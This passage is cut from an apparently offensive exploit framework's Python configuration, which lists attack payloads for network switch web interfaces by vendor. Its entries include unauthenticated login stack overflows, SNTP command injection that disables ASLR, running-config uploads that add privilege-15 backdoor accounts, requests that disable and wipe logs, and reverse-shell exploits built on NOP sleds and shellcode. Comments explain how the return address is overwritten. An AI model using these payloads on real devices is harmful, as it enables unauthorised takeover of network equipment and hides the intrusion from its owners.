We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Bonus: Disable and clean logs\r\n\t\t\t\t\t#\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) 
+'_CMD_',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&en=0',\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&ta=0',\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&ta=1',\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sn=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sn=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Used for both 'heap' and 'stack'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/security.cgi?logout',\r\n\t\t\t\t\t\t'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Xhome': {\r\n\t\t\t\t'vendor': 'Xhome',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature 
Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': 
True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. 
We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ 
self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Pakedge': { \r\n\t\t\t\t'vendor': 'Pakedgedevice & Software 
Inc',\r\n\t\t\t\t'uri':'https://www.pakedge.com/products/switches/family/index.php',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 
+'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'2',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': 
True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. 
